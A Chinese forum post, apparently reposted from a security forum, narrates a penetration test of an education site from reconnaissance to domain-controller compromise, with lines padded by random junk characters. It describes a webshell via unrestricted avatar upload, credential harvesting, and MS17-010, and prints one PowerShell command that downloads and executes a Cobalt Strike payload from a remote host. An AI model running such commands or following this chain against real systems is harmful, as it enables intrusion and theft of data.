|
2 u. Q0 X, I1 |, y3 {
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
9 m! b, g. ~: G( o( M $ D) I% n, u0 z9 ^7 T4 i$ L
6 X/ ?2 m9 @, O2 E2 ^0 i 8 Y) I7 {% E3 D" t* n
. m7 r' T! y/ @9 q V
3 S0 \6 w& L& w1 d5 u+ U3 M: D 正文/ E( O( ~$ C7 r! X0 N
( o* t4 \% u' R" P6 }3 _
# \0 }3 e! e- F0 a' L
6 w/ f6 [9 @; `7 f7 ^% H . e8 N! M! t8 l
2 e+ B* r4 V5 w8 r0 s0 u! {
目标:www.xxxx.com(一家教育机构)
3 s* m: ], b) p打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
) [, F. h$ }8 P, B 6 H$ @* G+ a7 s# C# d0 ]! z6 n
2 t! y( G9 R" o8 @1 G3 ^; `  + z1 T4 H4 x4 u. U: |$ m! S5 h" j
2 F; O3 b3 d0 \5 m9 [% u
: q; \) K- ~. L5 o7 g 进行了简单的信息搜集
: y' H* @! g1 T5 P! N, Q8 [% k
$ e* {" ]1 s, O' c3 D6 ~# `
. O# l& Q0 P) D* n
) x X% v/ t& k( `, q8 \3 S) x6 K* u2 a+ \6 f
子域名搜集
# g( u4 k. p% i- e; \* p4 @& c
6 w+ U& _) I5 t0 C$ W
! h8 \7 Z" H% V/ b  ! P% T" m1 N# W$ g( g3 n
- \$ W. O p9 V8 G8 V
M' r5 Q+ v e fofa找资产
+ B& P" t- o! u! x& Z' x
* `1 I2 @( R# T, L% y4 n& l N- y" e k2 j) S; `$ K% C+ h
, J2 R" c3 c" s2 |3 T2 X: [, n4 X
% J. I3 \3 ~, c- S  1 {3 W* w* w) v% C$ i# h4 t
+ B9 L( U& }+ |6 j }
2 w, o; V& d! A
一共七个资产。去重之后只有两个。
( p. Y! k( f2 P8 r- u! k$ e9 U( h
. @7 [* r0 h$ L5 l5 {" c9 o J7 j# h
, S. F) v- @& c
! r( K4 e8 V6 Y8 F: l/ N
# f' z' L7 ]+ U$ a% b 目录探测- V; \+ d! [$ w( u, B2 Q) _+ i
9 a5 k0 K, C' _5 S* X
* V0 f ?# E7 g0 W1 Z. E4 y9 w& v3 F 
! ^) m( m$ }* J3 X0 G " ?) r8 P' I1 n# _: e8 ]6 A/ P
1 w, T( ^* s5 O- [: [
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
6 X/ e& {' l" ]( k: m% r1 F* t
s; w0 `6 ~7 s! c8 n) D. H- ^+ \
) G/ Z" v. } m/ |0 m
( ]" ^/ @6 i# {$ {! h
) w7 O9 l% o! }4 @ V" Y 我又尝试了通过修改返回包来绕过登录界面. ~: m; _, g. m! S" q9 {9 W2 U
1 @& X4 j! E7 ?& x2 U( A
, ^" }+ c( y. I% \, n1 X  5 {7 V' R& ?5 z) B4 N3 m* s
8 ~( F4 @/ i- G4 Y
) o. L. _( x# t! _* X 还是不行,尝试注入无果8 j: W! s( Q" D( A4 |, p; u
+ t- n p' N: T. _5 V p
7 S a( ^+ T2 l5 C6 I* {
 + S+ z5 ^, q3 Y/ Z
: |( d n0 r; K# K1 x0 E$ r- G
. {: @5 m! h( b: t6 S( t% E8 ` 不过我目录探测出了一处Spring信息泄露
6 D* ?8 R7 ]- o$ A& m5 w
% z6 a1 k2 A1 _* S, s) M9 P
' r5 v9 [ T1 ~0 O Y
! |3 x/ X+ i& a B
! W$ t/ A5 ?- P  , _+ b+ J6 O+ |" O+ V7 h
' P, `1 U7 z" |! M4 w
M' ~5 `. N: c% _' G" S) }$ G 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
- N# P4 m9 S: \7 N7 Y + [6 A9 H* x# ~' x' G
$ R8 E& _2 n. m8 @3 g  ; o& h" T. j M: j5 I0 x$ \
- A' R$ T$ s: Y: E
# U/ \( u7 i- s4 P) S. f 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。1 ^2 k: z; s- z- b% X- v- ?
3 X- D9 g5 I/ d. |% E; W! u
8 v' O( w D( a- B5 t  ( M p! @" s8 w2 W' J& x
' l) t* @) u: ^2 q, v
8 d' N. A, Y! e) c7 I
获取有些师傅到这一步就手机抓包电脑测了。
; ~ |( s; ]6 c9 D/ |
6 v8 O# h5 R! B" T
N1 v7 l( L4 P/ f; ?! ^' S% }, f8 } Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。6 ?5 {- c3 T& D' I7 R
6 ], N8 y6 r7 i
5 H6 u* P$ {; h8 Z' Y4 M- p 其中在一个公众号发现了小程序,可以进行注册。
. n: B1 a/ t8 M, p2 w% b9 d 9 I2 A* c+ O! K Z$ v& S# P
% @; g% O: q9 ~ k# C7 x
看到了头像上传,尝试上传获取WebShell' N5 E- F1 g6 G$ y7 }1 e
% u& H, l# k6 S# x' L3 G+ c6 P4 ~. i9 f( E: p
i0 f) u M# y! R, r( D! R
- t$ e K* ~7 h6 q4 b+ P) J) Y; E, w
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
+ }4 [0 z# h: X- H) |
( o6 e' ~0 G$ d- }8 C5 R* q. l! a7 s
$ |' b9 o& \2 x# }3 I 
' [9 f: c, |4 D7 w
3 Z& G( T+ Q8 @, b4 C* c1 Q' w R- x- X" ^; u2 `( Y
然后上了大马3 z6 A* o- H6 p$ [* K% D) k
7 |2 b0 r& w# X0 n' }7 O% E+ e) x' E1 {" K
 2 L8 A& @$ L3 j2 l
8 c, p# p4 ]6 s. Z' ]. Y$ o
) J' o5 Y+ B1 j4 w+ r5 b 
, ]. p; G R3 B: t0 W7 w1 f& ` f0 P( {+ C0 e- N
+ m& h7 h+ x& L' ~* D* ~
通过翻找文件发现数据库账号密码$ c5 U9 H; y: n1 d" n, K
' \9 x3 D0 H% j# ^% N
$ j4 c+ k, K. j' x) g  : J+ O0 n& ~4 ^
. w$ Q8 Z( q' e2 h
6 P9 C C4 b+ ]: j --内网渗透: J2 d$ y2 B" C6 E) W! J t, k# ?
0 Y/ A7 o- m! S! @8 \. f
+ N, X; v( W$ J
直接通过powershell执行 cs上线6 Z$ I3 s5 C s( S. R( @. _ \
" N! W% z9 L& x! a6 d
^ h7 Z: t: y% ^* o8 V
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
# E2 ?. C4 p' m# W # B& A0 j! p7 Y2 F! p& k
" G# Y6 u2 D2 K. X7 g8 m
 + X: }' x1 Y: _6 D* a1 A/ K4 L. L
6 x& K" H9 s; x& W+ U' Q1 E
# R/ N( D3 _6 q7 w/ w- P 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破9 h# ~2 B, \0 ]3 C, W. {
0 ^/ w A3 {5 [* Q7 N- E( A5 l+ r1 Y: j4 D9 m# O
 * I& v0 I( a5 n0 i$ y( s
. w0 U" ~" [" `/ T# w
* E2 p0 n5 V8 \ B1 j 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
9 h* B& O4 a6 b" N& L2 a
: c8 u2 G5 Z8 V4 |: ~7 Z. X
0 z4 Q- L1 R* E" n9 ]0 q { C' b' S
4 H( P) t2 @. O! W. c * D% a. Q h$ Z7 B" I7 d
4 g' T9 E& Y6 w! k 
, V* B# J8 h- s, i. G! n& `1 | 9 |: Q/ M+ @. ^+ G
0 Z7 a6 e- C5 M+ H/ Q. h8 v# D 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
6 B' L/ i& b% N
. `5 G) p+ g4 |
2 e& ]1 D* A6 X! Y
* u4 E! r( S' Y; y1 ?: e7 B. U! H7 c9 Z
 : t- E7 Y: @- |' _
' b; i& L0 g* a# p. x! {7 Y+ N5 z+ c; s' U: u4 B
/ {( y3 ?1 k' U; e. M
( A' |) c4 z" {6 F8 @) h R
( _5 L& q: y. i2 R6 [) @ 5 ^ y$ v% Q9 w$ h M
T- P% _1 F2 u
' t' Q9 ~; q3 N" {
) g0 y# a6 u' I+ j" A2 L0 B5 C: c9 J8 S8 f) z
小结
0 }9 Q H" Y( {
; z' Z" f) O8 B! @# t+ l& G4 _( s$ O7 l7 S1 e! \4 U1 n& n e( `- c/ Q
3 M+ T; Q U0 ?; n3 }
: n6 G9 h& s+ R1 u
9 |: O2 Q- e v1 j 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!. |5 {* X0 O, P; w
/ d- t) H- E8 S, A, a1 z; J5 w. c/ ^9 Y- i8 s3 M
; W) c3 ]! o- w
- R, [* V5 M* |: C
/ ~; D- I# r5 x7 L% Q x4 v# \ - 5 a. Y5 }, u0 G0 s9 l
% e8 c3 t1 s& f. X/ Y# n
6 p0 A$ d# f4 A ]# [' } W) d -
9 B" _: c2 T3 r4 W0 v ' z6 t8 \; D/ ]1 }) Q; k
6 G! ?: F% v! c; f' r0 b
" b4 }* X2 @9 B# B w
5 O0 g9 i( M8 y$ z( H6 ]; ^ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
6 k7 f$ p( N$ N7 C3 ?4 |2 V
: a( B, l% u2 d/ @( A/ b
4 B7 d# P7 C" c/ m1 q
2 Q8 {5 x8 I: m1 D | 
发表于 2024-3-1 19:41:32
收藏
支持
反对